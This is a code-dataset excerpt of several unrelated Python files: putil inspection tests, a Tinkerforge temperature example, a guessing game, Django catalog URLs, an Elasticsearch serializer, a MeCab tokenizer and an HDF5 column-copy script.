CS(str(obj), rtext)\n ftime = int(os.path.getmtime(src))\n while int(time.time()) <= ftime:\n time.sleep(0.1)\n os.remove(src)\n content = 'def my_func():\\n pass'\n with open(src, 'w') as fobj:\n fobj.write(content)\n obj.refresh()\n assert obj._fnames[src] != tmod\n rtext = (\n 'Modules:\\n'\n ' putil.pit\\n'\n ' putil.test\\n'\n 'putil.pit.my_func: func (1-2)\\n'\n 'putil.test._get_fargs: func (32-67)\\n'\n 'putil.test._pcolor: func (68-82)\\n'\n 'putil.test.assert_arg_invalid: func (83-115)\\n'\n 'putil.test.assert_exception: func (116-199)\\n'\n 'putil.test._invalid_frame: func (200-206)\\n'\n 'putil.test.assert_prop: func (207-246)\\n'\n 'putil.test.assert_ro_prop: func (247-266)\\n'\n 'putil.test.compare_strings: func (267-356)\\n'\n 'putil.test.compare_strings.colorize_lines: func (296-307)\\n'\n 'putil.test.compare_strings.print_non_diff: func (308-312)\\n'\n 'putil.test.compare_strings.print_diff: func (313-321)\\n'\n 'putil.test.comp_list_of_dicts: func (357-371)\\n'\n 'putil.test.exception_type_str: func (372-389)\\n'\n 'putil.test.get_exmsg: func (390-404)'\n )\n CS(str(obj), rtext)\n ## Test malformed JSON file\n obj = putil.pinspect.Callables()\n json_src = os.path.join(os.path.dirname(ref), 'pit.json')\n json_txt = (\n '{{\\n'\n ' \"_callables_db\": {{\\n'\n ' \"putil.pit.my_func\": {{\\n'\n ' \"code_id\": [\\n'\n ' \"{pyfile}\",\\n'\n ' 1\\n'\n ' ],\\n'\n ' \"last_lineno\": 2,\\n'\n ' \"name\": \"putil.pit.my_func\",\\n'\n ' \"type\": \"func\"\\n'\n ' }}\\n'\n ' }},\\n'\n ' \"_class_names\": [],\\n'\n ' \"_fnames\": {{\\n'\n ' \"{pyfile}\": {{\\n'\n ' \"classes\": [],\\n'\n ' \"date\": 1,\\n'\n ' \"name\": \"putil.pit\"\\n'\n ' }}\\n'\n ' }},\\n'\n ' \"_module_names\": [\\n'\n ' \"putil.pit\"\\n'\n ' ],\\n'\n ' \"_modules_dict\": {{\\n'\n ' \"putil.pit\": [\\n'\n ' {{\\n'\n ' \"code_id\": [\\n'\n ' \"{pyfile}\",\\n'\n ' 1\\n'\n ' ],\\n'\n ' \"last_lineno\": 2,\\n'\n ' \"name\": \"putil.pit.my_func\",\\n'\n ' \"type\": \"func\"\\n'\n ' }}\\n'\n ' ]\\n'\n ' }},\\n'\n ' \"_reverse_callables_db\": {{\\n'\n ' \"(\\'{pyfile}\\', 1)\": \"putil.pit.my_func\",\\n'\n ' \"(\\'{pyfile}\\', 10)\": \"putil.pit.my_func\"\\n'\n ' }}\\n'\n '}}\\n'\n )\n with open(json_src, 'w') as fobj:\n fobj.write(json_txt.format(pyfile=src.replace('\\\\', '/')))\n obj.load(json_src)\n obj.refresh()\n os.remove(json_src)\n os.remove(src)\n\n def test_load_save(self):\n \"\"\" Test load and save methods behavior \"\"\"\n # pylint: disable=R0914\n import putil.pcsv\n import tests.support.exdoc_support_module_1\n # Empty object\n obj1 = putil.pinspect.Callables()\n with putil.misc.TmpFile() as fname:\n obj1.save(fname)\n obj2 = putil.pinspect.Callables()\n obj2.load(fname)\n assert obj1 == obj2\n # 1 module trace\n mname = 'putil.pcsv.csv_file'\n cname = '{0}.CsvFile'.format(mname)\n obj1 = putil.pinspect.Callables([modfile(mname)])\n with putil.misc.TmpFile() as fname:\n obj1.save(fname)\n obj2 = putil.pinspect.Callables()\n assert not bool(obj2)\n obj2.load(fname)\n assert obj1 == obj2\n # Test merging of traced and file-based module information\n mname1 = 'putil.pcsv.csv_file'\n obj1 = putil.pinspect.Callables([modfile(mname1)])\n mname2 = 'tests.support.exdoc_support_module_1'\n obj2 = putil.pinspect.Callables([modfile(mname2)])\n with putil.misc.TmpFile() as fname1:\n with putil.misc.TmpFile() as fname2:\n obj1.save(fname1)\n obj2.save(fname2)\n obj3 = putil.pinspect.Callables(\n [modfile(mname1), modfile(mname2)]\n )\n obj4 = putil.pinspect.Callables()\n obj4.load(fname2)\n obj4.load(fname1)\n assert obj3 == obj4\n\n def test_load_exceptions(self):\n \"\"\" Test load method exceptions \"\"\"\n obj = putil.pinspect.Callables()\n for item in [True, 5]:\n AI(obj.load, 'callables_fname', callables_fname=item)\n exmsg = 'File _not_a_file_ could not be found'\n AE(obj.load, OSError, exmsg, callables_fname='_not_a_file_')\n\n def test_save_exceptions(self):\n \"\"\" Test save method exceptions \"\"\"\n obj = putil.pinspect.Callables()\n for item in [True, 5]:\n AI(obj.save, 'callables_fname', callables_fname=item)\n\n def test_trace(self):\n \"\"\" Test trace method behavior \"\"\"\n import putil.pcsv\n mname = 'putil.pcsv.csv_file'\n cname = '{0}.CsvFile'.format(mname)\n xobj = putil.pinspect.Callables([modfile(mname)])\n ref = []\n ref.append('Modules:')\n ref.append(' {0}'.format(mname))\n ref.append('Classes:')\n ref.append(' {0}'.format(cname))\n ref.append('{0}._homogenize_data_filter: func (44-66)'.format(mname))\n ref.append('{0}._tofloat: func (67-82)'.format(mname))\n ref.append('{0}: class (83-958)'.format(cname))\n ref.append('{0}.__init__: meth (134-207)'.format(cname))\n ref.append('{0}.__eq__: meth (208-242)'.format(cname))\n ref.append('{0}.__repr__: meth (243-276)'.format(cname))\n ref.append('{0}.__str__: meth (277-321)'.format(cname))\n ref.append('{0}._format_rfilter: meth (322-338)'.format(cname))\n ref.append('{0}._gen_col_index: meth (339-351)'.format(cname))\n ref.append('{0}._get_cfilter: meth (352-354)'.format(cname))\n ref.append('{0}._get_dfilter: meth (355-357)'.format(cname))\n ref.append('{0}._get_rfilter: meth (358-360)'.format(cname))\n ref.append('{0}._reset_dfilter_int: meth (361-366)'.format(cname))\n ref.append('{0}._in_header: meth (367-401)'.format(cname))\n ref.append('{0}._set_cfilter: meth (402-406)'.format(cname))\n ref.append('{0}._set_dfilter: meth (407-412)'.format(cname))\n ref.append('{0}._set_rfilter: meth (413-417)'.format(cname))\n ref.append('{0}._add_dfilter_int: meth (418-460)'.format(cname))\n ref.append('{0}._apply_filter: meth (461-493)'.format(cname))\n ref.append('{0}._set_has_header: meth (494-497)'.format(cname))\n ref.append('{0}._validate_frow: meth (498-503)'.format(cname))\n ref.append('{0}._validate_rfilter: meth (504-537)'.format(cname))\n ref.append('{0}.add_dfilter: meth (538-561)'.format(cname))\n ref.append('{0}.cols: meth (562-581)'.format(cname))\n ref.append('{0}.data: meth (582-610)'.format(cname))\n ref.append('{0}.dsort: meth (611-663)'.format(cname))\n ref.append('{0}.header: meth (664-695)'.format(cname))\n ref.append('{0}.replace: meth (696-766)'.format(cname))\n ref.append('{0}.reset_dfilter: meth (767-784)'.format(cname))\n ref.append('{0}.rows: meth (785-804)'.format(cname))\n ref.append('{0}.write: meth (805-887)'.format(cname))\n ref.append('{0}.cfilter: prop (888-910)'.format(cname))\n ref.append('{0}.dfilter: prop (911-934)'.format(cname))\n ref.append('{0}.rfilter: prop (935-958)'.format(cname))\n ref_txt = '\\n'.join(ref)\n actual_txt = str(xobj)\n CS(actual_txt, ref_txt)\n #\n import tests.support.exdoc_support_module_1\n mname = 'tests.support.exdoc_support_module_1'\n xobj = putil.pinspect.Callables([modfile(mname)])\n ref = []\n cname = '{0}.ExceptionAutoDocClass'.format(mname)\n ref.append('Modules:')\n ref.append(' {0}'.format(mname))\n ref.append('Classes:')\n ref.append(' {0}'.format(cname))\n ref.append(' {0}.MyClass'.format(mname))\n ref.append('{0}._validate_arguments: func (17-31)'.format(mname))\n ref.append('{0}._write: func (32-36)'.format(mname))\n ref.append('{0}.write: func (37-50)'.format(mname))\n ref.append('{0}.read: func (51-62)'.format(mname))\n ref.append('{0}.probe: func (63-74)'.format(mname))\n ref.append('{0}.dummy_decorator1: func (75-79)'.format(mname))\n ref.append('{0}.dummy_decorator2: func (80-91)'.format(mname))\n ref.append('{0}.dummy_decorator2.wrapper: func (86-88)'.format(mname))\n ref.append('{0}.mlmdfunc: func (92-108)'.format(mname))\n ref.append('{0}: class (109-251)'.format(cname))\n ref.append('{0}.__init__: meth (112-124)'.format(cname))\n ref.append('{0}._del_value3: meth (125-132)'.format(cname))\n ref.append('{0}._get_value3: meth (133-141)'.format(cname))\n ref.append('{0}._set_value1: meth (142-152)'.format(cname))\n ref.append('{0}._set_value2: meth (153-166)'.format(cname))\n ref.append('{0}._set_value3: meth (167-177)'.format(cname))\n ref.append('{0}.add: meth (178-184)'.format(cname))\n ref.append('{0}.subtract: meth (185-191)'.format(cname))\n ref.append('{0}.multiply: meth (192-204)'.format(cname))\n ref.append('{0}.divide: meth (205-214)'.format(cname))\n ref.append('{0}.temp(getter): meth (215-219)'.format(cname))\n ref.append('{0}.temp(setter): meth (220-225)'.format(cname))\n ref.append('{0}.temp(deleter): meth (226-231)'.format(cname))\n ref.append('{0}.value1: prop (232-240)'.format(cname))\n ref.append('{0}.value2: prop (241-246)'.format(cname))\n ref.append('{0}.value3: prop (247-248)'.format(cname))\n ref.append('{0}.value4: prop (249-251)'.format(cname))\n ref.append('{0}.my_func: func (252-254)'.format(mname))\n ref.append('{0}.MyClass: class (255-259)'.format(mname))\n ref.append('{0}.MyClass.value: prop (259)'.format(mname))\n ref_txt = '\\n'.join(ref)\n actual_txt = str(xobj)\n CS(actual_txt, ref_txt)\n #\n import tests.test_exdoc\n mname = 'tests.test_exdoc'\n xobj = putil.pinspect.Callables([modfile(mname)])\n cname1 = '{0}.TestExDocCxt'.format(mname)\n cname2 = '{0}.TestExDoc'.format(mname)\n mename1 = '{0}.test_multiple'.format(cname1)\n mename2 = '{0}.test_build_ex_tree'.format(cname2)\n meroot = '{0}.test_get_sphinx'.format(cname2)\n ref = []\n ref.append('Modules:')\n ref.append(' tests.test_exdoc')\n ref.append('Classes:')\n ref.append(' tests.test_exdoc.MockFCode')\n ref.append(' tests.test_exdoc.MockGetFrame')\n ref.append(' tests.test_exdoc.TestExDoc')\n ref.append(' tests.test_exdoc.TestExDocCxt')\n ref.append('tests.test_exdoc.exdocobj: func (50-83)')\n ref.append('tests.test_exdoc.exdocobj.multi_level_write: func (55-60)')\n ref.append('tests.test_exdoc.exdocobj_raised: func (84-97)')\n ref.append('tests.test_exdoc.exdocobj_single: func (98-107)')\n ref.append('tests.test_exdoc.simple_exobj: func (108-123)')\n ref.append('tests.test_exdoc.simple_exobj.func1: func (113-116)')\n ref.append('tests.test_exdoc.mock_getframe: func (124-127)')\n ref.append('tests.test_exdoc.trace_error_class: func (128-139)')\n ref.append('tests.test_exdoc.MockFCode: class (140-145)')\n ref.append('tests.test_exdoc.MockFCode.__init__: meth (141-145)')\n ref.append('tests.test_exdoc.MockGetFrame: class (146-153)')\n ref.append('tests.test_exdoc.MockGetFrame.__init__: meth (147-153)')\n ref.append('{0}: class (154-263)'.format(cname1))\n ref.append('{0}.test_init: meth (156-208)'.format(cname1))\n ref.append('{0}.test_init.check_ctx1: func (159-164)'.format(cname1))\n ref.append('{0}.test_init.check_ctx2: func (165-171)'.format(cname1))\n ref.append('{0}.test_init.func0: func (172-178)'.format(cname1))\n ref.append('{0}: meth (209-245)'.format(mename1))\n ref.append('{0}.func1: func (211-217)'.format(mename1))\n ref.append('{0}.test_trace: func (218-234)'.format(mename1))\n ref.append('{0}.test_save_callables: meth (246-263)'.format(cname1))\n ref.append('{0}: class (264-698)'.format(cname2))\n ref.append('{0}.test_init: meth (266-282)'.format(cname2))\n ref.append('{0}.test_copy: meth (283-296)'.format(cname2))\n ref.append('{0}: meth (297-395)'.format(mename2))\n ref.append('{0}.func1: func (304-307)'.format(mename2))\n ref.append('{0}.mock_add_nodes1: func (309-310)'.format(mename2))\n ref.append('{0}.mock_add_nodes2: func (311-312)'.format(mename2))\n ref.append('{0}.mock_add_nodes3: func (313-314)'.format(mename2))\n ref.append('{0}.test_depth: meth (396-403)'.format(cname2))\n ref.append('{0}.test_exclude: meth (404-411)'.format(cname2))\n ref.append('{0}_autodoc: meth (412-439)'.format(meroot))\n ref.append('{0}_doc: meth (440-698)'.format(meroot))\n ref_txt = '\\n'.join(ref)\n actual_txt = str(xobj)\n CS(actual_txt, ref_txt)\n #\n import tests.support.pinspect_support_module_4\n mname = 'tests.support.pinspect_support_module_4'\n xobj = putil.pinspect.Callables([modfile(mname)])\n ref = []\n fname = '{0}.another_property_action_enclosing_function'.format(mname)\n ref.append('Modules:')\n ref.append(' {0}'.format(mname))\n ref.append('{0}: func (16-24)'.format(fname))\n ref.append('{0}.fget: func (21-23)'.format(fname))\n ref_txt = '\\n'.join(ref)\n actual_txt = str(xobj)\n CS(actual_txt, ref_txt)\n # Test re-tries, should produce no action and raise no exception\n xobj = putil.pinspect.Callables([modfile(mname)])\n import tests.support.pinspect_support_module_10\n mname = 'tests.support.pinspect_support_module_10'\n xobj = putil.pinspect.Callables([modfile(mname)])\n ref = []\n cname = '{0}.AClass'.format(mname)\n ref.append('Modules:')\n ref.append(' {0}'.format(mname))\n ref.append('Classes:')\n ref.append(' {0}'.format(cname))\n ref.append(' {0}.method1.SubClass'.format(cname))\n ref.append('{0}: class (6-28)'.format(cname))\n ref.append('{0}.method1: meth (12-25)'.format(cname))\n ref.append('{0}.method1.func1: func (15-18)'.format(cname))\n ref.append('{0}.method1.SubClass: class (20-23)'.format(cname))\n ref.append('{0}.method1.SubClass.__init__: meth (22-23)'.format(cname))\n ref.append('{0}.method2: meth (26-28)'.format(cname))\n ref_txt = '\\n'.join(ref)\n actual_txt = str(xobj)\n CS(actual_txt, ref_txt)\n\n\n def test_callables_db(self):\n \"\"\" Test callables_db property \"\"\"\n import tests.support.pinspect_support_module_4\n mname = 'tests.support.pinspect_support_module_4'\n xobj = putil.pinspect.Callables([modfile(mname)])\n pkg_dir = os.path.dirname(__file__)\n ref = {\n 'tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function': {\n 'code_id': (\n os.path.join(\n pkg_dir,\n 'support',\n 'pinspect_support_module_4.py'\n ), 16\n ),\n 'last_lineno': 21,\n 'name': 'pinspect_support_module_4.'\n 'another_property_action_enclosing_function',\n 'type': 'func'\n },\n 'tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget': {\n 'code_id': (\n os.path.join(\n pkg_dir,\n 'support',\n 'pinspect_support_module_4.py'\n ), 18\n ),\n 'last_lineno': 20,\n 'name': 'pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget',\n 'type': 'func'\n }\n }\n assert sorted(xobj.callables_db) == sorted(ref)\n ref = {\n (\n os.path.join(\n pkg_dir,\n 'support',\n 'pinspect_support_module_4.py'\n ),\n 16\n ): (\n 'pinspect_support_module_4.'\n 'another_property_action_enclosing_function'\n ),\n (\n os.path.join(\n pkg_dir,\n 'support',\n 'pinspect_support_module_4.py'\n ),\n 21\n ): (\n 'pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget'\n )\n }\n assert sorted(xobj.reverse_callables_db) == sorted(ref)\n\n def test_get_callable_from_line(self):\n \"\"\" Test get_callable_from_line() function \"\"\"\n xobj = putil.pinspect.Callables()\n import tests.support.pinspect_support_module_4\n fname = modfile('tests.support.pinspect_support_module_4')\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function')\n assert xobj.get_callable_from_line(fname, 16) == ref\n xobj = putil.pinspect.Callables([fname])\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function')\n assert xobj.get_callable_from_line(fname, 16) == ref\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function')\n assert xobj.get_callable_from_line(fname, 17) == ref\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function')\n assert xobj.get_callable_from_line(fname, 24) == ref\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget')\n assert xobj.get_callable_from_line(fname, 21) == ref\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget')\n assert xobj.get_callable_from_line(fname, 22) == ref\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget')\n assert xobj.get_callable_from_line(fname, 23) == ref\n ref = 'tests.support.pinspect_support_module_4'\n assert xobj.get_callable_from_line(fname, 100) == ref\n\n\n##\n# Tests for get_function_args()\n###\nclass TestGetFunctionArgs(object):\n \"\"\" Tests for get_function_args function \"\"\"\n def test_all_positional_arguments(self):\n \"\"\"\n Test that function behaves properly when all arguments are positional\n arguments\n \"\"\"\n def func(ppar1, ppar2, ppar3):\n pass\n obj = putil.pinspect.get_function_args\n assert obj(func) == ('ppar1', 'ppar2', 'ppar3')\n\n def test_all_keyword_arguments(self):\n \"\"\"\n Test that function behaves properly when all arguments are keywords\n arguments\n \"\"\"\n def func(kpar1=1, kpar2=2, kpar3=3):\n pass\n obj = putil.pinspect.get_function_args\n assert obj(func) == ('kpar1', 'kpar2', 'kpar3')\n\n def test_positional_and_keyword_arguments(self):\n \"\"\"\n Test that function behaves properly when arguments are a mix of\n positional and keywords arguments\n \"\"\"\n def func(ppar1, ppar2, ppar3, kpar1=1, kpar2=2, kpar3=3, **kwargs):\n pass\n assert putil.pinspect.get_function_args(func) == (\n 'ppar1', 'ppar2', 'ppar3', 'kpar1', 'kpar2', 'kpar3', '**kwargs'\n )\n assert putil.pinspect.get_function_args(func, no_varargs=True) == (\n 'ppar1', 'ppar2', 'ppar3', 'kpar1', 'kpar2', 'kpar3'\n )\n\n def test_no_arguments(self):\n \"\"\"\n Test that function behaves properly when there are no arguments\n passed\n \"\"\"\n def func():\n pass\n assert putil.pinspect.get_function_args(func) == ()\n\n def test_no_self(self):\n \"\"\"\n Test that function behaves properly when there are no arguments\n passed\n \"\"\"\n class MyClass(object):\n def __init__(self, value, **kwargs):\n pass\n obj = partial(putil.pinspect.get_function_args, MyClass.__init__)\n assert obj() == ('self', 'value', '**kwargs')\n assert obj(no_self=True) == ('value', '**kwargs')\n assert obj(no_self=True, no_varargs=True) == ('value', )\n assert obj(no_varargs=True) == ('self', 'value')\n\n def test_nonzero(self):\n \"\"\" Test __nonzero__() function \"\"\"\n obj = putil.pinspect.Callables()\n assert not obj\n obj.trace([modfile('putil.test')])\n assert obj\n","sub_path":"tests/test_pinspect.py","file_name":"test_pinspect.py","file_ext":"py","file_size_in_byte":34187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"333169420","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\nHOST = \"localhost\"\nPORT = 4223\nUID = \"abcde\" # Change to your UID\n\nfrom tinkerforge.ip_connection import IPConnection\nfrom tinkerforge.bricklet_temperature_ir import TemperatureIR\n\n# Callback for object temperature greater than 100 °C\n# (parameter has unit °C/10)\ndef cb_reached(temperature):\n print('The surface has a temperature of ' + str(temperature/10.0) + ' °C.')\n print('The water is boiling!')\n\nif __name__ == \"__main__\":\n ipcon = IPConnection() # Create IP connection\n tir = TemperatureIR(UID, ipcon) # Create device object\n\n ipcon.connect(HOST, PORT) # Connect to brickd\n # Don't use device before ipcon is connected\n\n # Set emissivity to 0.98 (emissivity of water)\n tir.set_emissivity(int(0xFFFF*0.98))\n\n # Get threshold callbacks with a debounce time of 10 seconds (10000ms)\n tir.set_debounce_period(10000)\n\n # Register threshold reached callback to function cb_reached\n tir.register_callback(tir.CALLBACK_OBJECT_TEMPERATURE_REACHED, cb_reached)\n\n # Configure threshold for \"greater than 100 °C\" (unit is °C/10)\n tir.set_object_temperature_callback_threshold('>', 100*10, 0)\n\n raw_input('Press key to exit\\n') # Use input() in Python 3\n ipcon.disconnect()\n","sub_path":"software/examples/python/example_water_boiling.py","file_name":"example_water_boiling.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"57332948","text":"from time import sleep\r\nfrom random import randint\r\n\r\nprint('PENSANDO EM UM NÚMERO ENTRE 0 E 10... TENTE ADIVINHÁ-LO!')\r\nsleep(3)\r\ncomputador = randint(0, 10) # Randomiza um número entre 0 e 10.\r\n\r\nflag = 1\r\ntentativas = 0 # Tentativas até acertar.\r\nwhile flag != 0:\r\n resposta = int(input('Em que número eu pensei? '))\r\n tentativas += 1 # Adiciona mais uma tentativa.\r\n\r\n if resposta != computador: # Se a resposta for diferente.\r\n print('\\nFelizmente não foi esse. Tente novamente.')\r\n if computador < resposta:\r\n print('Dica: eu acho que é menos...\\n')\r\n elif computador > resposta:\r\n print('Dica: eu acho que é mais...\\n')\r\n\r\n else: # Se não for igual, acerta.\r\n # Verifica as condições para a resposta apropriada.\r\n if tentativas == 1:\r\n print('Parabéns, você acertou de primeira!')\r\n else:\r\n print('Parabéns, você acertou!\\n'\r\n f'Mas você precisou de {tentativas} tentativas.')\r\n\r\n flag = 0 # A flag recebe 0 e o laço é quebrado.\r\n","sub_path":"ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"408608854","text":"from django.conf.urls import url\n\nfrom .views import ( BookCreate, BookUpdate,\n BookDelete,BookList,\n book_detail, DvdList,\n DvdCreate,DvdUpdate,\n DvdDelete, dvd_detail, Catalog)\n\nurlpatterns = [\n url(r'^$',\n Catalog.as_view(),\n name='catalog_view'),\n url(r'^dvd/$',\n DvdList.as_view(),\n name='dvd_list'),\n url(r'^dvd/create/$',\n DvdCreate.as_view(),\n name='dvd_create'),\n url(r'^dvd/(?P[\\w\\-]+)/$',\n dvd_detail,\n name='dvd_detail'),\n url(r'^dvd/(?P[\\w\\-]+)/update/$',\n DvdUpdate.as_view(),\n name='dvd_update'),\n url(r'^dvd/(?P[\\w\\-]+)/delete/$',\n DvdDelete.as_view(),\n name='dvd_delete'),\n url(r'^book/$',\n BookList.as_view(),\n name='book_list'),\n url(r'^book/create/$',\n BookCreate.as_view(),\n name='book_create'),\n url(r'^book/(?P[\\w\\-]+)/$',\n book_detail,\n name='book_detail'),\n url(r'^book/(?P[\\w\\-]+)/update/$',\n BookUpdate.as_view(),\n name='book_update'),\n url(r'^book/(?P[\\w\\-]+)/delete/$',\n BookDelete.as_view(),\n name='book_delete'),\n ]\n","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"606776199","text":"\"\"\" JSON serializer for Elasticsearch use\n\"\"\"\nfrom datetime import date, datetime\nfrom decimal import Decimal\n\nfrom elasticsearch.serializer import JSONSerializer\n\n\nclass CMRESSerializer(JSONSerializer):\n \"\"\" JSON serializer inherited from the elastic search JSON serializer\n\n Allows to serialize logs for a elasticsearch use.\n Manage the record.exc_info containing an exception type.\n \"\"\"\n def default(self, data):\n \"\"\" Default overrides the elasticsearch default method\n\n Allows to transform unknown types into strings\n\n :params data: The data to serialize before sending it to elastic search\n \"\"\"\n result = None\n if isinstance(data, (date, datetime)):\n result = data.isoformat()\n elif isinstance(data, Decimal):\n result = float(data)\n else:\n result = str(data)\n return result\n","sub_path":"cmreslogging/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"271805060","text":"import MeCab\n\nclass Tokenizer:\n def __init__(self, dict_path=\"\", add_stopwords=[]):\n self.stopwords = self.read_stopwords()\n self.stopwords += add_stopwords\n self.mecab = MeCab.Tagger(dict_path)\n \n \n def read_stopwords(self):\n stopwords = ['あそこ', 'あたり', 'あちら', 'あっち', 'あと', 'あな', 'あなた', 'あれ', 'いくつ', 'いつ', 'いま', 'いや', 'いろいろ', 'うち',\n 'おおまか', 'おまえ', 'おれ', 'がい', 'かく', 'かたち', 'かやの', 'から', 'がら', 'きた', 'くせ', 'ここ', 'こっち', 'こと', \n 'ごと','こちら', 'ごっちゃ', 'これ', 'これら', 'ごろ', 'さまざ��', 'さらい', 'さん', 'しかた', 'しよう', 'すか', 'ずつ', 'すね', \n 'すべて', 'ぜんぶ', 'そう', 'そこ', 'そちら', 'そっち', 'そで', 'それ', 'それぞれ', 'それなり', 'たくさん', 'たち', 'たび', \n 'ため', 'だめ', 'ちゃ', 'ちゃん', 'てん', 'とおり', 'とき', 'どこ', 'どこか', 'ところ', 'どちら', 'どっか', 'どっち', 'どれ', \n 'なか', 'なかば', 'なに', 'など', 'なん', 'はじめ', 'はず', 'はるか', 'ひと', 'ひとつ', 'ふく', 'ぶり', 'べつ', 'へん', \n 'ぺん', 'ほう', 'ほか', 'まさ', 'まし', 'まとも', 'まま', 'みたい', 'みつ', 'みなさん', 'みんな', 'もと', 'もの', 'もん', \n 'やつ', 'よう', 'よそ', 'わけ', 'わたし', '', 'ハイ', '', '', '上', '中', '下', '字', '', '', '年', '月', '日', '時',\n '分', '秒', '週', '火', '水', '木', '金', '土', '国', '都', '道', '府', '県', '市', '区', '町', '村', '', '', '各',\n '第', '方', '何', '的', '度', '文', '者', '性', '体', '人', '他', '今', '部', '課', '係', '外', '類', '達', '気', \n '室', '口', '誰', '用', '界', '会', '首', '男', '女', '別', '話', '私', '屋', '店', '家', '場', '等', '見', '際', \n '観', '段', '略', '例', '系', '論', '形', '間', '地', '員', '線', '点', '書', '品', '力', '法', '感', '作', '元', \n '手', '数', '彼', '彼女', '子', '内', '楽', '喜', '怒', '哀', '輪', '頃', '化', '境', '俺', '奴', '高', '校', '婦',\n '伸', '紀', '誌', 'レ', '行', '列', '事', '士', '台', '集', '様', '所', '歴', '器', '名', '情', '連', '毎', '式', \n '簿', '回', '匹', '個', '席', '束', '歳', '目', '通', '面', '円', '玉', '枚', '前', '後', '左',\n '右', '次', '先', '春', '夏', '秋', '冬', '一', '二', '三', '四', '五', '六', '七', '八', '九', \n '十', '百', '千', '万', '億', '兆', '', '', '下記', '上記', '時間', '今回', '前回', '場合', '一つ', '年生', '自分', \n 'ヶ所', 'ヵ所', 'カ所', '箇所', 'ヶ月', 'ヵ月', 'カ月', '箇月', '名前', '本当', '確か', '時点', '全部', '関係', '近く', \n '方法', '我々', '違い', '多く', '扱い', '新た', 'その後', '半ば', '結局', '様々', '以前', '以後', '以降', '未満', '以上',\n '以下', '幾つ', '毎日', '自体', '向こう', '何人', '手段', '同じ', '感じ']\n return stopwords\n \n \n def mecab_tokenizer(self, text, hinshi_list=['名詞', '形容詞', '動詞']):\n node = self.mecab.parseToNode(text)\n subtype_list = ['数', '非自立', '代名詞','接尾']\n output = []\n \n while node:\n if node.surface != '':\n wordtype = node.feature.split(',')[0]\n subtype = node.feature.split(',')[1]\n original = node.feature.split(',')[6]\n \n if (wordtype in hinshi_list) and (subtype not in subtype_list) and (original not in self.stopwords):\n if original != '*':\n output.append(original)\n \n # 未知語\n else:\n output.append(node.surface)\n \n node = node.next\n if node is None:\n break\n \n return output\n \n \n def tokenize_df(self, df, hinsi_list=['名詞', '形容詞', '動詞'], col_names=['user_description', 'text']): \n token_dic = {}\n for col in col_names:\n df[col] = df[col].apply(lambda x: self.mecab_tokenizer(x, hinsi_list))\n token_dic[col] = df[col].values.tolist()\n \n return token_dic","sub_path":"tokenizer/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"638065010","text":"import pandas as pd\n\nimport numpy as np\nimport os, sys\nfrom glob import glob\nfrom copy import copy\nfrom array import array\nsys.path.insert(0, 'nTupleAnalysis/python/') #https://github.com/patrickbryant/nTupleAnalysis\n\nimport multiprocessing\nimport argparse\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument('-i', '--inFile', default='/uscms/home/bryantp/nobackup/ZZ4b/data2018*/picoAOD.h5', type=str, help='Input h5 File.')\nparser.add_argument('-o', '--outputName', default='', type=str, help='Output root File dir.')\nparser.add_argument('-d', '--debug', dest=\"debug\", action=\"store_true\", default=False, help=\"debug\")\nparser.add_argument( '--varList', default=None, help=\"comma separated list of variables\")\nargs = parser.parse_args()\n\ninPaths = args.inFile.split()\ninFiles = []\nfor path in inPaths:\n if \"root://\" in path:\n inFiles.append(path)\n else:\n inFiles += glob(path)\nprint(inFiles)\n\n\nfor f in inFiles:\n h5FileIn = f\n h5FileOut = h5FileIn.replace(\".h5\",\"_\"+args.outputName+\".h5\")\n print(\"Reading\",h5FileIn)\n storeIn = pd.HDFStore(h5FileIn, 'r')\n\n nrows = int(storeIn.get_storer('df').nrows)\n ncols = int(storeIn.get_storer('df').ncols)\n print(\"Input: nrows\", nrows, \"ncols\",ncols)\n df = storeIn.select('df', start=0, stop=1)\n\n chunksize = 1e4\n\n print(\"Writting\",h5FileOut)\n storeOut = pd.HDFStore(h5FileOut ,mode='w')\n\n data = {}\n #varList = \"DvT3_DataVsTT_3b_pt3\"\n varsToCopy = args.varList.split(\",\") + [\"dRjjClose\"]\n print(\"Variableh output:\")\n for v in varsToCopy:\n print(\"\\t\",v)\n\n dfOut = None\n\n for chunk in range(int(nrows//chunksize) + 1):\n start, stop= int(chunk*chunksize), int((chunk+1)*chunksize)\n df = storeIn.select('df', start=start, stop=stop)\n\n if dfOut is None: dfOut = df[varsToCopy]\n else: dfOut = dfOut.append(df[varsToCopy])\n\n\n \n storeOut.append('df', dfOut, format='table', data_columns=None, index=False)\n storeOut.close()\n\n #\n # Test\n #\n storeTest = pd.HDFStore(h5FileOut, 'r')\n nrows = int(storeTest.get_storer('df').nrows)\n ncols = int(storeTest.get_storer('df').ncols)\n print(\"Output: nrows\", nrows, \"ncols\",ncols)\n\n print(\"converted:\",f)\n 